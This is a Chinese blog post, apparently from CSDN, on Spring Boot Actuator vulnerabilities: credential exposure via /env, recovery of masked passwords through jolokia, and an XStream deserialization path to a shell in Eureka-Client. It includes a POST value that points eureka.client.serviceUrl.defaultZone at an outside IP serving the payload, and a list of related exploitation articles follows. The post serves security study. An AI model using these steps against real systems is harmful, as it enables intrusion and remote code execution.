springboot漏洞

最新推荐文章于 2025-04-09 13:57:54 发布
最新推荐文章于 2025-04-09 13:57:54 发布
阅读量7.3k 收藏 11
点赞数 2
分类专栏: 初学者常见问题 文章标签: spring boot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43873557/article/details/113732548
版权
本文详细探讨了Spring Boot Actuators的安全漏洞,包括如何通过未授权的Actuator端点暴露敏感信息,如数据库配置,以及利用反序列化漏洞获取Shell的方法。文章提到了获取被脱敏密码的明文条件,以及针对Eureka-Client的特定版本利用漏洞的步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

➢ Spring介绍
Spring 是java web里非常常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化

➢ Actuators介绍
Spring Boot 基本上是 Spring 框架的扩展。Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息。

➢端点信息在这里插入图片描述
➢框架特征
小绿叶、404报错在这里插入图片描述
在这里插入图片描述
➢框架识别
https://github.com/rabbitmask/SB-Actuator

➢获取敏感信息
由于 actuator 会监控站点 mysql、mangodb 之类的数据库服务,所以通过监控信息
有时可以拿下 mysql、mangodb 数据库;这个主要通过/env 路径获取这些服务的配置信息

➢获取被星号脱敏的密码的明文
条件:
目标网站存在 /jolokia接口
目标使用了 jolokia-core 依赖
目标使用了 spring-cloud 依赖
步骤一: 找到想要获取的属性名
步骤二: jolokia 调用 org.springframework.cloud.context.environment Mbean 获取明文

➢获取被星号脱敏的密码的明文在这里插入图片描述
➢ GetShell
利用反序列化进行getshell(通过修改env配置文件进行xstream反序列化)
前置条件:Eureka-Client <1.8.7(多见于Spring Cloud Netflix)
spring-boot-starter-actuator(/refresh刷新配置需要)
spring-cloud-starter-netflix-eureka-client(功能依赖)
在这里插入图片描述
➢ GetShell
使用python3起一个服务,该服务为启动的xstream在这里插入图片描述
➢ GetShell
访问/env,修改为post:eureka.client.serviceUrl.defaultZone=http://139.9.198.30:6666/xstream
在这里插入图片描述
➢ GetShell
访问/refresh,修改为post:在这里插入图片描述

spring框架漏洞整理(Springboot漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 4432
2016年爆出的一个漏洞Springboot漏洞利用条件 至少知道一个触发 springboot 默认错误页面的接口及参数名 利用方法 Springboot漏洞步骤一:找到一个正常传参处 比如发现访问/article?id=xxx,页面会报状态码为 500 的错误:Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。 Springboot漏洞步骤二:执行 SpEL 表达式
springboot漏洞】Druid未授权访问漏洞,修复思路。springboot
游游的小博客
01-20 6850
Druid未授权访问漏洞,修复思路漏洞描述解决建议 漏洞描述 漏洞描述: Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。 解决建议 解决建议: 修改中间件配置 给出的例子,springboot的配置 spring: datasource: druid: max-active: 10 mi
SpringBoot漏洞大全
m0_67403188的博客
08-02 7168
前段时间做渗透发现了一个很眼熟的页面长这个样子页面log是去世界最大的同性交友网github.com搜了一下发现了一个十分详细的文章存在大量接口信息泄露成功交差。
SpringBoot漏洞
weixin_51151498的博客
01-19 1万+
spring漏洞
Java之SpringBoot漏洞利用姿势合集总结详细版,从零开始到精通,收藏这篇就够了!
最新发布
yy1715713348的博客
04-09 1094
闲暇之余,学习总结一下。
Spring Boot中的安全漏洞防护
微赚开发者技术分享博客
06-29 1230
大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!随着软件应用程序的复杂性增加,安全漏洞成为开发者不可忽视的重要问题。Spring Boot提供了强大的安全性配置选项和集成能力,帮助开发者有效地保护应用程序免受常见的安全攻击。通过Spring Security,我们可以实现复杂的认证和授权逻辑,包括基于角色的访问控制、OAuth认证、单点登录等。Spring Boot提供了一些内置的安全特性和配置选项,帮助开发者加固应用程序的安全性。
SpringBoot历史漏洞复现_springboot漏洞,2024年最新真的醉了
m0_62289824的博客
04-15 3382
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~(img-yTSj4IpJ-1713175561720)]//转化的格式base。//反弹shell脚本。
SpringBoot漏洞学习资料合集:实战技巧与黑盒评估清单
1. SpringBoot漏洞学习资料 SpringBoot作为一款流行的Java开发框架,广泛应用于微服务架构中。其安全漏洞的学习主要涉及以下几个方面: - 依赖注入漏洞:学习如何通过不当的依赖注入导致数据泄露或者权限提升。 -...
Java之SpringBoot漏洞利用姿势合集总结详细版,从零基础到精通,收藏这篇就够了!
Libra1313的博客
04-01 1441
Spring 框架,江湖人称 Java 界的瑞士军刀,功能那是相当强大,目标是提供一个高效且可扩展的开发环境。。,提供了依赖注入(IoC)、面向切面编程(AOP)、数据访问和事务管理等神兵利器。Spring MVC。DispatcherServlet、注解驱动、视图解析,三大特性让你轻松驾驭 Web 开发。,基于 Spring Framework,自动配置、内嵌服务器、快速启动,让你告别繁琐配置。自动配置、内嵌 Tomcat、独立运行、Starter 依赖,四大金刚护体。
浅析SpringBoot框架常见未授权访问漏洞
热门推荐
道阻且长,行则将至
02-23 1万+
本文总结学习了 Swagger-UI、SpringBoot Actuator、Druid、Webpack 组件的未授权访问漏洞基本原理与漏洞探测方法,在介绍了几款自动化扫描工具的同时,也简要分析了 CVE-2022-22947 Spring Cloud Gateway RCE 漏洞
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 8003
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
SpringBoot漏洞利用
SuperherRo的博客
11-06 3561
Spring是Java EE编程领域的一个轻量级开源框架,而spring boot是基于Sping优化而来的全新java框架 在日常的项目中经常会遇到使用Spring Boot框架的网站,博主对该框架的常见利用方式进行了整理。此文中的漏洞环境均在本地搭建。 本文聚焦于在黑盒角度中如何发现漏洞、利用漏洞
Spring Boot 项目 90% 存在这 15 个致命漏洞,你的代码在裸奔吗?
风象南的专栏
03-23 1468
项目中的安全问题不容忽视,开发者需要时刻保持警惕,采取积极的措施来保护应用的安全。
springboot 修复 Spring Framework 特定条件下目录遍历漏洞(CVE-2024-38816)
记录点滴
10-14 8703
springboot2.x升级到3.x实战经验总结安全版本6.0.24 和 6.1.13 是springboot3.x使用的版本,springboot3.x的用户只需要将springboot升级到最新版本即可,官方已发布最新版本,如下图所示,springboot3.2以下版本已不再提供更新维护。祝大家升级顺利!
Spring Boot Actuator 漏洞复现合集
drnrrwfs的博客
06-12 1万+
Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
Spring Boot 的用户要注意 Jackson 反序列化漏洞
专业的开发者“讨论”
04-23 3994
对于使用Spring Boot的用户,请注意,当前版本(2.1.7)取决于较旧的易受攻击的jackson-databind 2.9.9软件包。
SpringBoot相关漏洞
Java团长的博客
06-19 5621
本文是 Spring Boot 相关漏洞的学习资源,仅作为安全研究和授权测试使用,不要用于非法活动。这个GitHub项目从信息泄露、远程代码执行两大方面,总结了 16 个案例,提供了详细的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值